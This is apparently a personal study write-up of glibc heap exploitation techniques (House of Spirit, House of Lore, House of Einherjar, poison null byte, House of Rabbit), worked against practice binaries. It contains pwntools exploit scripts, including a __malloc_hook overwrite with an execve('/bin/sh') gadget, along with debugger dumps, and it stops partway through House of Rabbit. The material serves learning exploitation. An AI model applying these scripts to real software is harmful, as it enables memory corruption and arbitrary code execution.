Fine, I'll Learn MORE Heap Exploitation
2025-01-02
House of Spirit (libc < 2.30)
This technique revolves around corrupting a pointer that is eventually passed to free(), tricking the allocator into freeing a fake chunk and ultimately enabling an arbitrary write. Below is the analysis and a step-by-step breakdown.
pwndbg> vis
0x603000 0x0000000000000000 0x0000000000000021 ........!.......
0x603010 0x5a5a5a5a5a5a5a5a 0x5a5a5a5a5a5a5a5a ZZZZZZZZZZZZZZZZ
0x603020 0x0a5a5a5a5a5a5a5a 0x0000000000020fe1 ZZZZZZZ......... <-- Top chunk
pwndbg> p m_arry
No symbol "m_arry" in current context.
pwndbg> f 2
#2 0x000000000040096b in main (argc=1, argv=0x7fffffffdd78) at pwnable_house_of_spirit.c:65
warning: 65 pwnable_house_of_spirit.c: No such file or directory
pwndbg> ptype m_array
type = struct chunk {
char name[8];
char *ptr;
} [8]
Pointer setup:
pwndbg> p m_array
$1 = {{
name = "AAAA\n\000\000",
ptr = 0x603010 'Z' <repeats 23 times>, "\n\341\017\002"
}, {
name = "\000\000\000\000\000\000\000",
ptr = 0x0
Target structure for arbitrary write:
pwndbg> ptype user
type = struct user {
unsigned long unused_0;
unsigned long age;
char unused_1[64];
char target[16];
char unused_2[16];
char username[64];
}
The stack overflow allows overwriting the ptr field in m_array[0], which is later used in a free operation.
pwndbg> p m_array[0]
$1 = {
name = "VVVVVVVV",
ptr = 0x5656565656565656 <error: Cannot access memory at address 0x5656565656565656>
}
Potential issues with the size flags:
0x6f = the IS_MMAPPED flag is the problem
> malloc_chunk &user
PREV_INUSE | IS_MMAPED | NON_MAIN_ARENA
Addr: 0x602010
Size: 0x68 (with flag bits: 0x6f)
0x6d = NON_MAIN_ARENA is the problem.
> malloc_chunk &user
PREV_INUSE | NON_MAIN_ARENA
Addr: 0x602010
Size: 0x68 (with flag bits: 0x6d)
0x69 = fails aligned_OK
if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
malloc_printerr ("free(): invalid size");
0x61 = fails the av->system_mem check, as the next chunk's size field is 0
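The failure modes above can be condensed into a small model. This is only a Python sketch of free()'s initial size checks, not glibc's actual code; the constants mirror 64-bit glibc, and `free_size_check` is a made-up helper name.

```python
PREV_INUSE     = 0x1
IS_MMAPPED     = 0x2
NON_MAIN_ARENA = 0x4
SIZE_BITS      = PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA
MALLOC_ALIGN_MASK = 0xF   # 16-byte alignment on x86-64
MINSIZE = 0x20

def free_size_check(size_field):
    """Return the name of the first check a fake size field would
    fail in free(), or None if the initial checks pass."""
    if size_field & IS_MMAPPED:
        return "IS_MMAPPED"          # free() takes the munmap path
    if size_field & NON_MAIN_ARENA:
        return "NON_MAIN_ARENA"      # free() looks up a foreign arena
    size = size_field & ~SIZE_BITS   # chunksize(): strip the flag bits
    if size < MINSIZE or size & MALLOC_ALIGN_MASK:
        return "aligned_OK/MINSIZE"  # "free(): invalid size"
    return None                      # may still fail later checks

for s in (0x6F, 0x6D, 0x69, 0x61, 0x81):
    print(hex(s), "->", free_size_check(s))
```

Note that 0x61 passes these initial checks and only dies later at the av->system_mem comparison, which this sketch does not model.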
The final setup for everything:
> dq &user 22
0000000000602010 A[0000000000000000 0000000000000081 <- Fake size field (the "age" value)
0000000000602020 0000000000000000 0000000000000000
0000000000602030 0000000000000000 0000000000000000
0000000000602040 0000000000000000 0000000000000000
0000000000602050 0000000000000000 0000000000000000
0000000000602060 0058585858585858 0000000000000000
0000000000602070 0000000000000000 0000000000000000
0000000000602080 0000000000000000 0000000000000000
0000000000602090 0000000000000000]0000000000020fff <- Next chunk size field.
00000000006020a0 0000000000000000 0000000000000000
00000000006020b0 0000000000000000 0000000000000000
> fastbins
0x80: 0x602010 (user) ◂— 0
# Set the "age" field.
age = 0x81
io.sendafter(b"age: ", f"{age}".encode())
# Set the "username" field.
username = p64(0x00) * 3 + p64(0x20fff)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")
# Fill it with data and name it.
name = b"A" * 8 + p64(elf.sym.user + 0x10)
chunk_A = malloc(0x18, b"Y" * 0x18, name)
free(chunk_A)
chunk_B = malloc(0x78, b"Z" * 64 + b"Pwned!!", b"B")
io.interactive()
Unsorted bin Perspective
# Set the "age" field.
age = 0x91
io.sendafter(b"age: ", f"{age}".encode())
# Set the "username" field.
username = p64(0x00) * 5 + p64(0x11) + p64(0) + p64(0x01)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")
# Fill it with data and name it.
name = b"A" * 8 + p64(elf.sym.user + 0x10)
chunk_A = malloc(0x18, b"Y" * 0x18, name)
free(chunk_A)
chunk_B = malloc(0x88, b"Z" * 64 + b"Pwned!!", b"B")
io.interactive()
pwndbg> dq &user 22
0000000000602010 0000000000000000 0000000000000091
0000000000602020 5a5a5a5a5a5a5a5a 5a5a5a5a5a5a5a5a
0000000000602030 5a5a5a5a5a5a5a5a 5a5a5a5a5a5a5a5a
0000000000602040 5a5a5a5a5a5a5a5a 5a5a5a5a5a5a5a5a
0000000000602050 5a5a5a5a5a5a5a5a 5a5a5a5a5a5a5a5a
0000000000602060 00212164656e7750 0000000000000000
0000000000602070 0000000000000000 0000000000000000
0000000000602080 0000000000000000 0000000000000000
0000000000602090 0000000000000000 0000000000000000
00000000006020a0 0000000000000090 0000000000000011
00000000006020b0 0000000000000000 0000000000000001
Code Execution
Constraints:
- Fastbin Size Range: Ensure target size fits within fastbin range.
- Flag Management: Avoid IS_MMAPPED or NON_MAIN_ARENA in the size field.
- Alignment: Ensure 16-byte alignment.
- Valid Metadata: Maintain valid succeeding size fields to bypass checks.
What we need to bypass:
if (__builtin_expect (contiguous (av)
&& (char *) nextchunk
>= ((char *) av->top + chunksize(av->top)), 0))
malloc_printerr ("double free or corruption (out)");
Use a double free (fastbin dup)
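Why free(A), free(B), free(A) slips through: glibc's fastbin path only compares the chunk being freed against the current bin head. Here is a toy Python model of that behaviour; the `Fastbin` class is invented for illustration, not a real API.

```python
# Toy model of the fastbin double-free ("fasttop") check: only the
# current bin head is compared against the chunk being freed, so
# freeing A, B, A does not abort.
class Fastbin:
    def __init__(self):
        self.chunks = []                 # index 0 is the bin head (LIFO)

    def free(self, chunk):
        if self.chunks and self.chunks[0] == chunk:
            raise RuntimeError("double free or corruption (fasttop)")
        self.chunks.insert(0, chunk)

    def malloc(self):
        return self.chunks.pop(0)

bin_ = Fastbin()
bin_.free("A"); bin_.free("B"); bin_.free("A")   # no abort: B sits between
order = [bin_.malloc() for _ in range(3)]
print(order)
```

The third malloc of "A" returns a chunk that is still linked into the bin, which is what lets us plant a fake fd (here, a pointer into `user`).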
# Set the "age" field.
age = 0x91
io.sendafter(b"age: ", f"{age}".encode())
# Set the "username" field.
username = p64(0x00) * 5 + p64(0x11) + p64(0) + p64(0x01)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")
# Fill it with data and name it.
chunk_A = malloc(0x68, b"A" * 0x08, b"A" * 0x08)
chunk_B = malloc(0x68, b"B" * 0x08, b"B" * 0x08)
chunk_C = malloc(0x18, b"Y" * 0x18, b"C" * 0x08 + p64(heap + 0x10) )
free(chunk_A)
free(chunk_B)
free(chunk_C)
malicious = malloc(0x68, p64(libc.sym.__malloc_hook - 35), b"C" * 8)
chunk_D = malloc(0x68, b"D" * 0x08, b"A" * 0x08)
chunk_E = malloc(0x68, b"E" * 0x08, b"B" * 0x08)
'''
0xe1fa1 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL || {[rsp+0x50], [rsp+0x58], [rsp+0x60], [rsp+0x68], ...} is a valid argv
'''
chunk_user = malloc(0x68, b"X" * 0x13 + p64(libc.address + 0xe1fa1), b"F" * 8)
malloc(1,b"",b"")
io.interactive()
Takeaways
- Power and control: the exploit requires precise control over the pointer passed to free().
- Size field validity: the size field must avoid critical flags like IS_MMAPPED.
- Double-free strategy: leveraging fastbin dup for arbitrary writes is key to achieving exploitation.
House of Lore (libc < 2.28)
This write-up explores a Use-After-Free (UAF) vulnerability leading to exploitation via the unsorted bin. Specifically, we demonstrate how to craft a write primitive by leveraging the unsorted bin's bk pointer.
- Read-after-free
- Write-after-free <- the flaw in this example
- Call-after-free
Unsortedbin Variant
Consider the following heap layout. We have control over the metadata of a freed chunk:
0x603000 0x0000000000000000 0x0000000000000091 ................ <-- unsortedbin[all][0]
0x603010 0x5959595959595959 0x5a5a5a5a5a5a5a5a YYYYYYYYZZZZZZZZ
0x603020 0x000000000000000a 0x0000000000000000 ................
0x603030 0x0000000000000000 0x0000000000000000 ................
0x603040 0x0000000000000000 0x0000000000000000 ................
0x603050 0x0000000000000000 0x0000000000000000 ................
0x603060 0x0000000000000000 0x0000000000000000 ................
0x603070 0x0000000000000000 0x0000000000000000 ................
0x603080 0x0000000000000000 0x0000000000000000 ................
0x603090 0x0000000000000090 0x0000000000000090 ................
0x6030a0 0x0000000000000000 0x0000000000020f61 ........a.......
0x6030b0 0x0000000000000000 0x0000000000000000 ................
0x6030c0 0x0000000000000000 0x0000000000000000 ................
0x6030d0 0x0000000000000000 0x0000000000000000 ................
0x6030e0 0x0000000000000000 0x0000000000000000 ................
0x6030f0 0x0000000000000000 0x0000000000000000 ................
0x603100 0x0000000000000000 0x0000000000000000 ................
0x603110 0x0000000000000000 0x0000000000000000 ................
0x603120 0x0000000000000000 0x0000000000020ee1 ................ <-- Top chunk
Using the write-after-free vulnerability, we overwrite the bk pointer of a chunk in the unsorted bin to point to a controlled location:
0x24918000 0x0000000000000000 0x00000000000000a1 ................ <-- unsortedbin[all][0]
0x24918010 0x0000000000000000 0x0000000000602010 ......... `.....
0x24918020 0x0000000000000000 0x0000000000000000 ................
0x24918030 0x0000000000000000 0x0000000000000000 ................
Now that we have exploited the write-after-free, malloc will search the unsorted bin from back to front and conduct a partial unlink.
Before malloc:
pwndbg> unsortedbin
unsortedbin
all [corrupted]
FD: 0x24918000 ◂— 0
BK: 0x24918000 —▸ 0x602010 (user) ◂— 0
When malloc allocates the chunk, it processes the unsorted bin using the partial unlink process. The corrupted bk pointer is used to adjust heap structures.
After malloc:
pwndbg> unsortedbin
unsortedbin
all [corrupted]
FD: 0x24918000 ◂— 0
BK: 0x602010 (user) ◂— 0
The bk pointer now points to the target memory location where we want to write, and that location is now accessible for writing:
0000000000602010 00006567726f6547 0000000000000000 <-- overflow "username", then need valid size field.
0000000000602020 00007f96be597b58 0000000000000000 <-- main arena fd
0000000000602030 0000000000000000 0000000000000000
0000000000602040 0058585858585858 0000000000000000 <-- Target
0000000000602050 0000000000000000 0000000000000000
The unsorted bin now looks like:
unsortedbin
all [corrupted]
FD: 0x25ecb000 ◂— 0
BK: 0x602010 (user) —▸ 0x602000 (data_start) ◂— 0xe1
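The partial unlink that produces this state can be modelled in a few lines. This is a sketch with Python dicts standing in for malloc_chunk structs, assuming the glibc < 2.28 behaviour described above; `partial_unlink` is a made-up name for the relevant slice of malloc's unsorted-bin loop.

```python
# Minimal model of the unsorted-bin partial unlink: taking the victim
# off the bin writes the bin (main_arena) address into victim->bk->fd,
# which is exactly the write that landed inside `user` above.
def partial_unlink(bin_head, victim):
    bck = victim["bk"]
    bin_head["bk"] = bck        # the bin now "ends" at our fake chunk
    bck["fd"] = bin_head        # uncontrolled write: a main_arena pointer
    return victim

arena  = {"fd": None, "bk": None}      # stand-in for the unsorted bin head
fake   = {"fd": "stale", "bk": None}   # fake chunk placed at elf.sym.user
victim = {"fd": arena, "bk": fake}     # bk overwritten via the UAF edit
arena["bk"] = victim

partial_unlink(arena, victim)
```

After the unlink, `fake["fd"]` holds the bin address (the main_arena pointer seen in the dump) and `arena["bk"]` points at the fake chunk, so the next fitting malloc returns it.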
Final script for the write primitive:
'''
0xe1 = fake size field
p64(0) = fake `fd` that will be overwritten
p64(elf.sym.user - 16) = bk that keeps the partial unlink from tripping mitigations
'''
username = p64(0) + p64(0xe1) + p64(0) + p64(elf.sym.user - 16)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")
# Request 2 "normal" chunks.
chunk_A = malloc(0x98)
chunk_B = malloc(0x88)
# Free the first chunk into the unsortedbin.
free(chunk_A)
# Overwrite the bk of the free'd chunk.
edit(chunk_A, p64(0) + p64(elf.sym.user))
# Will cause the partial unlink AND then search the unsorted bin
# triggering the exploit
unsorted_bin_attack = malloc(0xd8)
# Overwrite our .data
edit(unsorted_bin_attack, p64(0)*4 + b"Pwned!\0")
Interesting Notes:
- Alignment Flexibility: Fake chunks can be misaligned, unlike fast bins.
- Flags: You can use invalid flags in the size field without causing immediate crashes.
- Recursive Exploitation: Pointing bk to another fake chunk or the chunk itself allows for multiple free operations.
Takeaways
Size sanity checks are important with this attack, and the fake chunk's bk must point to writable memory too.
Smallbins Variant
New concepts being introduced:
- Doubly Linked List
- Circular
- Size range: 0x20 to 0x3f0 (overlapping the fastbins)
- First in, first out
This is a small variation on the unsorted bin attack, but with an extra constraint. When allocating our fake chunk, the victim's bk is followed, and malloc checks that the fd of that chunk points back to the victim. This is one part of the safe unlinking check, which means you will need a heap leak to exploit this fully. In this case we have one, so we update the script accordingly.
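The extra check can be sketched as follows, again with dicts standing in for chunks; `smallbin_take` is a made-up name for the relevant slice of malloc's smallbin path. It shows why the fake chunk's fd must hold the victim's heap address, i.e. why a heap leak is required.

```python
# Sketch of the smallbin safe-unlink constraint: before handing out
# the victim, malloc verifies bck->fd == victim, else it aborts with
# "malloc(): smallbin double linked list corrupted".
def smallbin_take(bin_head, victim):
    bck = victim["bk"]
    if bck["fd"] is not victim:
        raise RuntimeError("malloc(): smallbin double linked list corrupted")
    bin_head["bk"] = bck
    bck["fd"] = bin_head
    return victim

victim = {"fd": None, "bk": None}     # real chunk; its address is the leak
fake   = {"fd": victim, "bk": None}   # fake chunk's fd points at the victim
victim["bk"] = fake
arena  = {"fd": victim, "bk": victim}

smallbin_take(arena, victim)          # passes; the fake chunk is next in line
```

If `fake["fd"]` held anything but the victim's address (say 0xdeadbeef), the check would abort, which is exactly why the script writes the leaked heap address into the username.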
# Populate the "username" field.
username = p64(elf.sym.user) + p64(0xdeadbeef) + p64(heap) + p64(elf.sym.user - 16)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")
# Request 2 "normal" chunks.
chunk_A = malloc(0x98)
chunk_B = malloc(0x88)
# Edit the first chunk.
edit(chunk_A, b"Y"*8)
# Free the first chunk into the unsortedbin.
free(chunk_A)
# Sort the freed chunk from the unsorted bin into the smallbin.
malloc(0xa8)
# Overwrite the bk of the free'd chunk.
edit(chunk_A, p64(0) + p64(elf.sym.user))
# Take the real chunk from the tail of the smallbin.
small_bin_attack = malloc(0x98)
# Allocate our fake chunk.
small_bin_attack = malloc(0x98)
edit(small_bin_attack, p64(0)*4 + b"Pwned!\0")
Visualized heap:
pwndbg> vis
0x2010f000 0x0000000000000000 0x00000000000000a1 ................ <-- smallbins[0xa0][0]
0x2010f010 0x0000000000000000 0x0000000000602010 ......... `.....
0x2010f020 0x0000000000000000 0x0000000000000000 ................
[ ... ]
0x2010f120 0x0000000000000000 0x0000000000000000 ................
0x2010f130 0x0000000000000000 0x00000000000000b1 ................
0x2010f140 0x0000000000000000 0x0000000000000000 ................
[ ... ]
0x2010f1d0 0x0000000000000000 0x0000000000000000 ................
0x2010f1e0 0x0000000000000000 0x0000000000020e21 ........!....... <-- Top chunk
pwndbg> dq &user
0000000000602010 0000000000602010 00000000deadbeef
0000000000602020 000000002010f000 0000000000602000
0000000000602030 0000000000000000 0000000000000000
0000000000602040 0058585858585858 0000000000000000
Takeaways
- Point the victim's bk to a fake chunk we prepared.
- The real chunk is allocated from the tail of the smallbin.
- Our fake chunk's fd must point back to the victim chunk to pass the partial unlink check.
- The fake smallbin chunk is then allocated back to us.
- There is no size field integrity check on the fake chunk.
- You can use misaligned chunks.
- A heap leak is needed.
Largebins Variant
- Structure: Doubly linked, circular.
- Size Range: 0x400 and above.
- Holds a range of sizes:
- 0x400 => 0x410, 0x420, 0x430
- 0x440 => 0x450, 0x460, 0x470
- Largest bin: 0x80000 and up (no upper limit).
Uses a skip list:
- Chunks are sorted in reverse order.
- The first chunk of each size points to the next size, skipping over chunks of the same size.
- If a size has only one chunk, it automatically becomes the skip chunk.
- Newly freed chunks are added to the head of the skip chunks.
- Head skip chunks are allocated last.
Which list should we target? The answer is either. Here is a normal fd attack on the largebins.
Allocation routine flow in malloc:
/* Avoid removing the first entry for a size so that the skip
   list does not have to be rerouted. */
if (victim != last (bin)
    && chunksize_nomask (victim)
       == chunksize_nomask (victim->fd))
  victim = victim->fd;

remainder_size = size - nb;
unlink (av, victim, bck, fwd);
Our fake chunk setup
dq &user
0000000000602010 0000000000000000 0000000000000401
0000000000602020 0000000000602010 0000000000602010
0000000000602030 0000000000000000 0000000000000000
0000000000602040 0058585858585858 0000000000000000
Final exploit
username = p64(0) + p64(0x401) + p64(elf.sym.user) + p64(elf.sym.user)
io.sendafter(b"username: ", username)
io.recvuntil(b"> ")
# Request 2 large chunks.
chunk_A = malloc(0x3f8)
malloc(0x88)
chunk_B = malloc(0x3f8)
malloc(0x88)
# Free both chunks into the unsortedbin.
free(chunk_A)
free(chunk_B)
# Right now they are in the unsorted bin.
# Trigger the search that sorts them into the largebin.
malloc(0x408)
# Overwrite the fd of the free'd chunk.
edit(chunk_A, p64(elf.sym.user))
chunk_C = malloc(0x3f8)
edit(chunk_C, p64(0)*4 + b"Pwned!\0")
io.interactive()
Takeaways
- An accurate size field is crucial.
- Overwriting next-size pointers is also necessary.
Overall
The House of Lore is mostly used to create fake chunks that overlap sensitive data.
House of Einherjar (libc < 2.28)
0x603000 0x0000000000000000 0x0000000000000091 ................ <-- unsortedbin[all][0]
0x603010 0x00007ffff7bafc80 0x00007ffff7bafc80 ................
0x603020 0x0000000000000000 0x0000000000000000 ................
0x603030 0x0000000000000000 0x0000000000000000 ................
0x603040 0x0000000000000000 0x0000000000000000 ................
0x603050 0x0000000000000000 0x0000000000000000 ................
0x603060 0x0000000000000000 0x0000000000000000 ................
ptype user
type = struct user {
char username[32];
char target[16];
}
pwndbg> dq &user
0000000000602010 4141414141414141 0a41414141414141
0000000000602020 0000000000000000 0000000000000000
0000000000602030 0058585858585858 0000000000000000
0000000000602040 0000000000000000 0000000000000000
The bug: a single NULL byte overflow
pwndbg> vis
0x603000 0x0000000000000000 0x0000000000000091 ................
0x603010 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA
0x603020 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA
0x603030 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA
0x603040 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA
0x603050 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA
0x603060 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA
0x603070 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA
0x603080 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA
0x603090 0x0a41414141414141 0x0000000000020f00 AAAAAAA......... <-- Top chunk
Targeting the top chunk alone may not yield significant results. However, overflowing into an adjacent allocated or free chunk provides more leverage, so we should target a larger neighbouring chunk:
0x603000 0x0000000000000000 0x0000000000000101 ................
0x603010 0x0000000000000000 0x0000000000000000 ................
0x603020 0x0000000000000000 0x0000000000000000 ................
As we can see, it clears the PREV_INUSE flag on an allocated chunk.
We simply pass the safe unlinking checks in order to allocate our fake chunk over our target.
What this looks like:
0xb3ed000 0x0000000000000000 0x0000000000000091 ................
0xb3ed010 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
[ ... ]
0xb3ed080 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0xb3ed090 0x00000000deadbeef 0x0000000000000100 ................
0xb3ed0a0 0x0000000000000000 0x0000000000000000 ................
[ ... ]
0xb3ed190 0x0000000000000000 0x0000000000020e71 ........q....... <-- Top chunk
We go after the unlinking process by creating a fake chunk.
# Populate the username field.
username = p64(0) + p64(0x31) + p64(elf.sym.user)+ p64(elf.sym.user)
io.sendafter(b"username: ", username)
# This program leaks its default heap start address.
io.recvuntil(b"heap @ ")
heap = int(io.recvline(), 16)
io.recvuntil(b"> ")
# Request 2 chunks.
chunk_A = malloc(0x88)
chunk_B = malloc(0xf8)
# Trigger the single NULL byte overflow with fake chunk
prev_size = (heap + 0x90) - elf.sym.user
edit(chunk_A, b"X"*0x80 + p64(prev_size))
When freeing chunk B, malloc attempts to consolidate backward because the PREV_INUSE flag is cleared. It reads the prev_size field (0x1080) and subtracts this value from the chunk's address (0x603090), resulting in 0x602010. This calculation points directly to the fake chunk we prepared in the data section.
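The arithmetic, using the addresses from this session (chunk B's header at 0x603090, the fake chunk at 0x602010 in .data):

```python
# Backward-consolidation arithmetic: the bogus prev_size bridges the
# gap between chunk B on the heap and the fake chunk in .data.
chunk_B_hdr = 0x603090
fake_chunk  = 0x602010             # elf.sym.user in the script
prev_size   = chunk_B_hdr - fake_chunk

print(hex(prev_size))              # the value the script writes
# free(B) computes prev_chunk = B - prev_size and lands on the fake chunk.
```

This is exactly the `prev_size = (heap + 0x90) - elf.sym.user` line in the script.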
vis
0x603000 0x0000000000000000 0x0000000000000091 ................
0x603010 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
[ ... ]
0x603080 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x603090 0x0000000000001080 0x0000000000000100 ................
0x6030a0 0x0000000000000000 0x0000000000000000 ................
[ ... ]
0x603190 0x0000000000000000 0x0000000000020e71 ........q....... <-- Top chunk
pwndbg> vis 0x0000000000602010
0x602010 0x0000000000000000 0x0000000000000031 ........1.......
0x602020 0x0000000000602010 0x0000000000602010 . `...... `.....
0x602030 0x0058585858585858 0x0000000000000000 XXXXXXX.........
Don't forget about the corrupted size vs. prev_size mitigation:
/* Take a chunk off a bin list */
#define unlink(AV, P, BK, FD) {
    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))
      malloc_printerr ("corrupted size vs. prev_size");
    FD = P->fd;
    BK = P->bk;
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
      malloc_printerr ("corrupted double-linked list");
    else {
When malloc reaches our chunk, it reads the size field and uses it to calculate the next address. In a normal scenario, this address would lead back to the victim chunk, as malloc had previously subtracted the prev_size field to reach the current chunk.
However, in this case, the process goes 0x31 bytes forward and reads a value there that does not match the prev_size field of the fake chunk. This discrepancy triggers the exploit mitigation. The vulnerability lies in our ability to control the size field: by setting it to 8, we can make it point back to itself, bypassing the mitigation. The root cause is that the check does not compare against the size field of the victim chunk, but rather against the size field it read from our fake chunk.
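A minimal model of the bypass, assuming the field offsets of a 64-bit malloc_chunk (prev_size at offset 0, size at offset 8); the helper names are invented for illustration:

```python
# With a size field of 8, next_chunk(P) = P + 8 points at the size
# field itself, so chunksize(P) == prev_size(next_chunk(P)) holds by
# construction and the "corrupted size vs. prev_size" check passes.
import struct

fake = struct.pack("<QQ", 0, 0x8)        # prev_size = 0, size = 8

def chunksize(mem, p):                   # size field at offset p+8, flags stripped
    return struct.unpack_from("<Q", mem, p + 8)[0] & ~0x7

def prev_size(mem, p):                   # prev_size field at offset p
    return struct.unpack_from("<Q", mem, p)[0]

p = 0
assert chunksize(fake, p) == prev_size(fake, p + chunksize(fake, p))
```

This is why the final exploit writes `p64(0x8)` as the fake chunk's size field instead of 0x31.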
This leads to the final exploit, which allows for a write primitive.
# Populate the username field.
username = p64(0) + p64(0x8) + p64(elf.sym.user)+ p64(elf.sym.user)
io.sendafter(b"username: ", username)
# This program leaks its default heap start address.
io.recvuntil(b"heap @ ")
heap = int(io.recvline(), 16)
io.recvuntil(b"> ")
# Request 2 chunks.
chunk_A = malloc(0x88)
chunk_B = malloc(0xf8)
# Trigger the single NULL byte overflow with fake chunk
prev_size = (heap + 0x90) - elf.sym.user
edit(chunk_A, b"X"*0x80 + p64(prev_size))
free(chunk_B)
a = malloc(0x88)
edit(a, p64(0) *2 + b"Pwned!\0")
Takeaways
- Clear the PREV_INUSE flag to allow backward consolidation.
- Provide a bogus prev_size value that points from the victim chunk to the fake chunk elsewhere in memory.
- Free a chunk to trigger backward consolidation.
- During this process, the allocator consolidates the free chunk with the fake chunk and bypasses safe unlinking checks.
- Ensure the fd and bk pointers in the fake chunk point back to itself to survive unlinking.
- Bypass the size vs. prev_size check (introduced as a mitigation in version 2.26 and updated in 2.29) by crafting the fake chunk's size field to always pass validation.
- Make an additional malloc call to overwrite the target data section, achieving the desired write primitive.
Google Poison Null Byte Technique
Creating overlapping heap chunks.
- Target a free chunk's size field
vis
0x603000 0x0000000000000000 A[ 0x0000000000000021 ........!.......
0x603010 0x0000000000000000 0x0000000000000000 ................
0x603020 0x0000000000000000 ] B[ 0x0000000000000211 ................ <-- unsortedbin[all][0]
0x603030 0x00007ffff7b97b58 0x00007ffff7b97b58 X{......X{......
[ ... ]
0x603230 0x0000000000000210 ] C[ 0x0000000000000090 ................
0x603240 0x0000000000000000 0x0000000000000000 ................
0x603250 0x0000000000000000 0x0000000000000000 ................
0x603260 0x0000000000000000 0x0000000000000000 ................
0x603270 0x0000000000000000 0x0000000000000000 ................
0x603280 0x0000000000000000 0x0000000000000000 ................
0x603290 0x0000000000000000 0x0000000000000000 ................
0x6032a0 0x0000000000000000 0x0000000000000000 ................
0x6032b0 0x0000000000000000 0x0000000000000000 ................
0x6032c0 0x0000000000000000 ] 0x0000000000000021 ........!.......
0x6032d0 0x0000000000000000 0x0000000000000000 ................
0x6032e0 0x0000000000000000 0x0000000000020d21 ........!....... <-- Top chunk
Overflow successful!
vis
0x603000 0x0000000000000000 0x0000000000000021 ........!.......
0x603010 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA
0x603020 0x4141414141414141 0x0000000000000200 AAAAAAAA........ <-- unsortedbin[all][0] !!
0x603030 0x00007ffff7b97b58 0x00007ffff7b97b58 X{......X{......
0x603040 0x0000000000000000 0x0000000000000000 ................
0x603050 0x0000000000000000 0x0000000000000000 ................
0x603060 0x0000000000000000 0x0000000000000000 ................
0x603070 0x0000000000000000 0x0000000000000000 ................
The remaindering process executes incorrectly because we overwrote the size field:
dq 0x603220
0000000000603220 0000000000000100 0000000000000000
0000000000603230 0000000000000210 0000000000000090
0000000000603240 0000000000000000 0000000000000000
0000000000603250 0000000000000000 0000000000000000
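To make the overlap concrete, here is what the single NULL byte does to chunk B's size field, using the values from the dumps above:

```python
# The off-by-one NULL write clears the low byte of B's size field,
# shrinking it from 0x211 to 0x200, while C's prev_size (0x210)
# still records the original extent -- the allocator's bookkeeping
# now disagrees with itself, which is what creates overlapping chunks.
size_B    = 0x211            # original size field (PREV_INUSE set)
corrupted = size_B & ~0xFF   # single NULL byte over the low byte

prev_size_C = 0x210          # untouched, still spans the old B
overlap = prev_size_C - (corrupted & ~0x1)   # bytes unaccounted for

print(hex(corrupted), hex(overlap))
```

Remainders carved out of the shrunken 0x200 region (chunk_b1, chunk_b2) therefore sit inside memory that chunk_C's metadata still claims, so freeing chunk_b1 and chunk_C produces overlapping free chunks.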
Final exploit code:
# Request 2 chunks.
chunk_A = malloc(0x18)
chunk_B = malloc(0x208)
chunk_C = malloc(0x88)
malloc(0x18) # Guard rail
free(chunk_B)
edit(chunk_A, b"A"*0x18 + p8(0))
chunk_b1 = malloc(0xf8)
chunk_b2 = malloc(0xf8)
free(chunk_b1)
free(chunk_C)
Takeaways
- No leaks are needed.
House of Rabbit
A double free, with the same end goal as the House of Force: bypass the size sanity checks. Largebins are exempt from them and have no size cap, so we can allocate from a fake chunk.
Fastbin dup -> into the largest largebin.
First, a fastbin dup combined with an unsorted bin free:
age = 1
io.sendafter(b"age: ", f"{age}".encode())
io.recvuntil(b"> ")
very_big = malloc(0x5fff8, b"Z"*8) # surpass the mmap threshold
# Request 2 fast chunks.
fast_A = malloc(24, b"A"*8)
fast_B = malloc(24, b"B"*8)
#Fastbin dup
free(fast_A)
free(fast_B)
free(fast_A) # Double free
# Link the fake chunk; the "age" field becomes its size field.
fast_A = malloc(24, p64(elf.sym.user))
# Get our fake chunk into the unsorted bin through free() (malloc_consolidate).
malloc_consolidate = malloc(0x88, b"A"*8)
free(malloc_consolidate)
io.interactive()
We ran into an issue: we can't request a "very big chunk", as our system_mem value is too low, so malloc serves our chunk with mmap instead.
A Quick Aside About MMAP
malloc uses the mmap syscall to serve very large requests, on the assumption that they are one-offs. Such chunks have the IS_MMAPPED flag set. The mmap threshold lives in mp_:
pwndbg> ptype mp_
type = struct malloc_par {
unsigned long trim_threshold;
size_t top_pad;
size_t mmap_threshold; //<- here
size_t arena_test;
size_t arena_max;
int n_mmaps;
int n_mmaps_max;
int max_n_mmaps;
int no_dyn_threshold;
size_t mmapped_mem;
size_t max_mmapped_mem;
char *sbrk_base; // <- start of the default heap
}
Right now our threshold is:
$2 = {
trim_threshold = 0x20000,
top_pad = 0x20000,
mmap_threshold = 0x20000, // <- here
arena_test = 0x8,
arena_max = 0x0,
n_mmaps = 0x1,
n_mmaps_max = 0x10000,
max_n_mmaps = 0x1,
no_dyn_threshold = 0x0,
mmapped_mem = 0x61000,
max_mmapped_mem = 0x61000,
sbrk_base = 0x34327000
}
The threshold adjustment lives in the free path of malloc.c (below). It is hit when we allocate, free, then allocate again, thus increasing the system_mem size.
//malloc.c:2933
if (chunk_is_mmapped (p)) /* release mmapped memory. */
{
/* See if the dynamic brk/mmap threshold needs adjusting.
Dumped fake mmapped chunks do not affect the threshold. */
if (!mp_.no_dyn_threshold
&& chunksize_nomask (p) > mp_.mmap_threshold
&& chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
&& !DUMPED_MAIN_ARENA_CHUNK (p))
{
mp_.mmap_threshold = chunksize (p);
